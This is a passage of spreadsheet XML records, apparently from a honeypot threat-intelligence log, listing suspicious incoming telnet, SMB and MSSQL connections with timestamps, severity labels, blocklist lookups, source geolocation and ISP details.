    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:d720"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2570"/>
    <x v="2570"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:32"/>
    <d v="2024-03-18T13:16:13"/>
    <d v="2025-04-08T17:06:32"/>
    <n v="172"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;20301&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Chakala Industrial Area)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1205"/>
    <s v="72.8694"/>
    <s v="17665"/>
    <s v="ONEOTT INTERTAINMENT LIMITED"/>
    <s v="Entire In2Cable"/>
    <s v="residential"/>
    <s v="Indusind Media And Communication Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cbc0:d222"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2571"/>
    <x v="2571"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:20"/>
    <d v="2024-05-28T18:12:09"/>
    <d v="2025-04-08T17:06:20"/>
    <n v="364"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;24248&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:a28b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2572"/>
    <x v="2572"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:02:51"/>
    <d v="2023-07-24T15:41:59"/>
    <d v="2025-04-08T17:02:51"/>
    <n v="1283"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;36879&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:3755"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2573"/>
    <x v="2573"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:02:38"/>
    <d v="2024-07-11T23:40:00"/>
    <d v="2025-04-08T17:02:38"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;445&amp;&amp;40864&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:6c4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2574"/>
    <x v="2574"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:01:02"/>
    <d v="2025-02-21T20:16:28"/>
    <d v="2025-04-08T17:01:02"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0798"/>
    <s v="121.571"/>
    <s v="24165"/>
    <s v="UNION BROADBAND NETWORK"/>
    <s v="UBBNET"/>
    <s v="business"/>
    <s v="TFN Media Co., Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d40:1237"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2575"/>
    <x v="2575"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:57:39"/>
    <d v="2025-04-08T08:10:47"/>
    <d v="2025-04-08T16:57:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SY"/>
    <s v="Syria"/>
    <s v="DI"/>
    <s v="Dimashq"/>
    <s v="Damascus"/>
    <s v="Damascus (Al Mazzeh)"/>
    <s v="170654"/>
    <s v="NA"/>
    <s v="33.491"/>
    <s v="36.243"/>
    <s v="29256"/>
    <s v="Syrian Telecom"/>
    <s v="SAMANET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2012-07-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:586:f8f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2576"/>
    <x v="2576"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:56:09"/>
    <d v="2025-04-08T16:56:09"/>
    <d v="2025-04-08T16:56:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:d20c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2577"/>
    <x v="2577"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:35:34"/>
    <d v="2025-04-07T04:34:27"/>
    <d v="2025-04-08T16:35:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.8185"/>
    <s v="39.2863"/>
    <s v="33765"/>
    <s v="TANZANIA TELECOMMUNICATIONS CO. LTD"/>
    <s v="TTCL"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-04-13"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:1d17"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2578"/>
    <x v="2578"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:34:27"/>
    <d v="2025-03-06T13:12:07"/>
    <d v="2025-04-08T16:34:27"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="6746&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv (Svyatoshyns'kyi District)"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4564"/>
    <s v="30.382"/>
    <s v="202103"/>
    <s v="Lanet Network Ltd"/>
    <s v="Lanet Network"/>
    <s v="business"/>
    <s v="Lanet Network Ltd"/>
    <s v="2010-10-12"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5c34:969e"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2579"/>
    <x v="2579"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:14:05"/>
    <d v="2025-04-08T16:14:05"/>
    <d v="2025-04-08T16:14:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MV"/>
    <s v="Maldives"/>
    <s v="26"/>
    <s v="Kaafu Atoll"/>
    <s v="NA"/>
    <s v="Malé"/>
    <s v="1282027"/>
    <s v="NA"/>
    <s v="4.17521"/>
    <s v="73.5092"/>
    <s v="7642"/>
    <s v="DHIRAAGU-MV-AP"/>
    <s v="Dhiraagu Pvt.Ltd"/>
    <s v="consumer"/>
    <s v="Dhiraagu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d1d4:d446"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2580"/>
    <x v="2580"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:09:18"/>
    <d v="2025-04-08T16:09:18"/>
    <d v="2025-04-08T16:09:18"/>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3:c5d7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2581"/>
    <x v="2581"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T16:01:04"/>
    <d v="2023-11-25T04:45:13"/>
    <d v="2025-04-08T16:01:04"/>
    <n v="253"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="10394&amp;&amp;25430&amp;&amp;1433&amp;&amp;445&amp;&amp;38154"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Aurangabad"/>
    <s v="Aurangabad"/>
    <s v="1278149"/>
    <s v="NA"/>
    <s v="19.8776"/>
    <s v="75.3423"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,62177)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,62816)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,34551)}&amp;&amp;{Data_SMB:Incoming connection (60.254.61.243,34942)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cfe:3df3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2582"/>
    <x v="2582"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:59:02"/>
    <d v="2025-04-06T19:15:08"/>
    <d v="2025-04-08T15:59:02"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="2012-01-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2525:fde2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2583"/>
    <x v="2583"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:57:11"/>
    <d v="2025-04-08T15:57:11"/>
    <d v="2025-04-08T15:57:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783e:b32e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2584"/>
    <x v="2584"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T15:56:24"/>
    <d v="2023-12-03T23:58:00"/>
    <d v="2025-04-08T15:56:24"/>
    <n v="210"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;42341&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="62"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="São Paulo"/>
    <s v="3448439"/>
    <s v="01000-000"/>
    <s v="-23.5558"/>
    <s v="-46.6396"/>
    <s v="272539"/>
    <s v="ENEVE TELECOMUNICACOES LTDA"/>
    <s v="Eneve Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="Eneve Telecomunicacoes Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
